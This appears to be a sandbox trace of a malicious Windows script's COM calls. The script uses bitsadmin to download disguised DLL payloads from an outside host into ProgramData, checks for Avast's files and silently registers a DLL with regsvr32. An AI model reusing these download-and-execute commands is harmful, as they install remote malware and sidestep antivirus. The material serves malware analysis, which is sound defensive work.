[0073.741] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxb.gif.zip?93543106 C:\\ProgramData\\tempa\\marxvxinhhmxb.gif", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxb.gif.zip?93543106 C:\\ProgramData\\tempa\\marxvxinhhmxb.gif", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0075.428] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0075.429] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/r1.log C:\\ProgramData\\tempa\\r1.log", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/r1.log C:\\ProgramData\\tempa\\r1.log", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0076.287] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0076.288] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhm98.dll.zip?714489159 C:\\ProgramData\\tempa\\marxvxinhhm98.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhm98.dll.zip?714489159 C:\\ProgramData\\tempa\\marxvxinhhm98.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0077.838] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0077.838] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?31092521 C:\\ProgramData\\tempa\\marxvxinhhm64.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?31092521 C:\\ProgramData\\tempa\\marxvxinhhm64.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0079.136] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0079.137] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e400, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="FileExists", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=10016) returned 0x0
[0079.137] FileSystemObject:IUnknown:AddRef (This=0x7e400) returned 0x2
[0079.137] FileSystemObject:IDispatch:Invoke (in: This=0x7e400, dispIdMember=10016, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4*(varType=0xb, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x7e400) returned 0x0
[0079.137] FileSystemObject:IUnknown:Release (This=0x7e400) returned 0x1
[0079.137] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?86737238 C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?86737238 C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0080.079] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0080.079] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x1d75a40), [1]=0xcea58*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [2]=0xcea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cmd /k echo %time% && timeout 5 > NUL && exit", varVal2=0x1d74600)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x1d75a40), [1]=0xcea58*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [2]=0xcea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cmd /k echo %time% && timeout 5 > NUL && exit", varVal2=0x1d74600)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x0) returned 0x0
[0085.014] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0085.014] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e400, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="FileExists", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=10016) returned 0x0
[0085.014] FileSystemObject:IUnknown:AddRef (This=0x7e400) returned 0x2
[0085.014] FileSystemObject:IDispatch:Invoke (in: This=0x7e400, dispIdMember=10016, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4*(varType=0xb, wReserved1=0x1d9, wReserved2=0xeed8, wReserved3=0xc, varVal1=0xffff, varVal2=0x0), pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x7e400) returned 0x0
[0085.014] FileSystemObject:IUnknown:Release (This=0x7e400) returned 0x1
[0085.015] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e400, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="FileExists", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=10016) returned 0x0
[0085.016] FileSystemObject:IUnknown:AddRef (This=0x7e400) returned 0x2
[0085.016] FileSystemObject:IDispatch:Invoke (in: This=0x7e400, dispIdMember=10016, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\aswRunDll.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\aswRunDll.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4*(varType=0xb, wReserved1=0x1d9, wReserved2=0xeed8, wReserved3=0xc, varVal1=0x0, varVal2=0x0), pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x7e400) returned 0x0
[0085.016] FileSystemObject:IUnknown:Release (This=0x7e400) returned 0x1
[0085.017] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e400, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="FileExists", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=10016) returned 0x0
[0085.018] FileSystemObject:IUnknown:AddRef (This=0x7e400) returned 0x2
[0085.018] FileSystemObject:IDispatch:Invoke (in: This=0x7e400, dispIdMember=10016, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\aswRunDll.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\aswRunDll.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4*(varType=0xb, wReserved1=0x1d9, wReserved2=0xeed8, wReserved3=0xc, varVal1=0x0, varVal2=0x0), pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x7e400) returned 0x0
[0085.018] FileSystemObject:IUnknown:Release (This=0x7e400) returned 0x1
[0085.024] WshShell:IDispatch:Invoke (in: This=0x2a8064, dispIdMember=1610809345, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), [1]=0xcea58*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x1d74600), [2]=0xcea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" ", varVal2=0x1d74600), [3]=0xcea78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" /s \"C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll\"", varVal2=0x0), [4]=0xcea88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="regsvr32.exe", varVal2=0x1d74600)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), [1]=0xcea58*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x1d74600), [2]=0xcea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" ", varVal2=0x1d74600), [3]=0xcea78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" /s \"C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll\"", varVal2=0x0), [4]=0xcea88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="regsvr32.exe", varVal2=0x1d74600)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x0) returned 0x0
[0085.078] WshShell:IUnknown:Release (This=0x2a8064) returned 0x1
[0085.078] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e400, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="FileExists", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=10016) returned 0x0
[0085.078] FileSystemObject:IUnknown:AddRef (This=0x7e400) returned 0x2
[0085.079] FileSystemObject:IDispatch:Invoke (in: This=0x7e400, dispIdMember=10016, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa\\marxvxinhhm64.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa\\marxvxinhhm64.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4*(varType=0xb, wReserved1=0x1d9, wReserved2=0xeed8, wReserved3=0xc, varVal1=0xffff, varVal2=0x0), pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x7e400) returned 0x0
[0085.079] FileSystemObject:IUnknown:Release (This=0x7e400) returned 0x1
[0085.079] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e400, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="FileExists", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=10016) returned 0x0
[0085.079] FileSystemObject:IUnknown:AddRef (This=0x7e400) returned 0x2
[0085.079] FileSystemObject:IDispatch:Invoke (in: This=0x7e400, dispIdMember=10016, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\aswRunDll.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\aswRunDll.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4*(varType=0xb, wReserved1=0x1d9, wReserved2=0xeed8, wReserved3=0xc, varVal1=0x0, varVal2=0x0), pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x7e400) returned 0x0
[0085.080] FileSystemObject:IUnknown:Release (This=0x7e400) returned 0x1
[0085.080] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e400, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="FileExists", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=10016) returned 0x0
[0085.080] FileSystemObject:IUnknown:AddRef (This=0x7e400) returned 0x2
[0085.080] FileSystemObject:IDispatch:Invoke (in: This=0x7e400, dispIdMember=10016, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\aswRunDll.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\aswRunDll.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4*(varType=0xb, wReserved1=0x1d9, wReserved2=0xeed8, wReserved3=0xc, varVal1=0x0, varVal2=0x0), pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x7e400) returned 0x0
[0085.080] FileSystemObject:IUnknown:Release (This=0x7e400) returned 0x1
